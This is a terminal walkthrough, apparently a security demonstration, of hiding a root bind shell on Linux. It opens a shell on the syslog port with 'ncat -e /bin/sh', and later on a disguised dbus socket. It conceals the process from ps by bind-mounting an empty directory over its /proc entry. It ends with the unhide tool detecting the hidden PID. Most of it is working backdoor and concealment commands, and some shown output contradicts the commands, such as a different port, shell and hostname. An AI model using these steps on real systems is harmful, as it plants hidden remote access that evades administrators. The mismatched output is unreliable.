Hiding a process behind the syslog process by using the same port
ncat listening on port 514 (the syslogd port) and offering a shell
root@hp2:~# (ncat -l 514 -k -e /bin/sh)&
Verifying that the shell is reachable
root@hp2:~# ncat localhost 514
pwd
/root
^C
The process is easily spotted in the process list
root@hp2:~# ps -ef |grep [n]cat
708 548 0:00 0:50 3848 1460 root S ncat -l 1234 -k -e /bin/ash
Hiding the process by bind-mounting an empty directory over its /proc entry
root@hp2:~# mkdir /media/null
root@hp2:~# mount -o bind /media/null/ /proc/708
The process is no longer listed
root@hp2:~# ps -ef |grep [n]cat
The listening port is still visible, but it is no longer attributed to any process (the PID/Program column shows "-")
root@asus:~# netstat -tlanup|grep 514
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN -
tcp6 0 0 :::514 :::* LISTEN -
udp 0 0 0.0.0.0:514 0.0.0.0:* 572/syslogd
The same technique with a UNIX domain socket
root@asus:~# (ncat -l -U /var/run/dbus/system_bus_control -k -e /bin/sh )&
root@asus:~# ps -ef |grep [n]cat
root 4433 1921 0 15:14 pts/0 00:00:00 ncat -l -U /var/run/dbus/system_bus_control -k -e /bin/sh
root@asus:~# mount -o bind /media/null/ /proc/4433
root@asus:~# ps -ef |grep [n]cat
root@asus:~
root@asus:~# ncat -U /var/run/dbus/system_bus_control
pwd
/root
^C
root@asus:~# ss -xlp|grep system_bus_socket
u_str LISTEN 0 128 /var/run/dbus/system_bus_socket 23858 * 0 users:(("dbus-daemon",pid=880,fd=4))
Countermeasure: unhide detects the hidden PID by comparing the results of system calls, /proc, directory listings and ps
root@asus:~# ./unhide-linux quick
Unhide 20121229
Copyright © 2012 Yago Jesus & Patrick Gouin
License GPLv3+ : GNU GPL version 3 or later
http://www.unhide-forensics.info
Used options:
[*]Searching for Hidden processes through comparison of results of system calls, proc, dir and ps
Found HIDDEN PID: 4433 <----------------
Cmdline: "<none>"
Executable: "<no link>"
"<none> ... maybe a transitory process"